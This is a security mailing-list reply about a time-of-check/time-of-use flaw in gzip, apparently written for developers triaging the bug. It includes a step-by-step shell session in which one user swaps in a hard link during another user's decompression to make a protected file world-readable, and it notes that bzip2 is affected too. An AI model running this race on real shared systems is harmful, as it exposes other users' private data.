Re: gzip TOCTOU file-permissions vulnerability
Joey Hess wrote:
Martin Pitt wrote:
<cut>
Maybe I understood you wrong, could you please give a small test case
which describes the vulnerability exactly?
I'm a wimp, so I will use gdb instead of writing some real exploit to
win the race.
It is quite easy to win the race when the file that's being decompressed
is big:
---
# adduser user-good
# adduser user-evil
# usermod -G src user-good
# usermod -G src user-evil
# mkdir /var/www/proj
# chown root.src /var/www/proj
# chmod 2775 /var/www/proj
user-good@zimage:/var/www/proj$ echo "Rather secret data" > secf.txt
user-good@zimage:/var/www/proj$ chmod 400 secf.txt
user-good@zimage:/var/www/proj$ ls -al secf.txt
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256
user-evil@zimage:/var/www/proj$ gzip bigf.bin
user-evil@zimage:/var/www/proj$ chmod 666 bigf.bin.gz
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin.gz
-rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
cat: secf.txt: Permission denied
user-good@zimage:/var/www/proj$ gzip -d bigf.bin.gz
user-evil@zimage:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
Rather secret data
---
The time between beginning of decompression and unlink+delete was about
2 sec. and decompression has finished about 7-8 seconds later.
The same was tested and applyes to bzip2.
Best regards,
Theodor
--
Theodor Milkov
http://www.zimage.del.bg/
CCNA, CCNP, MCP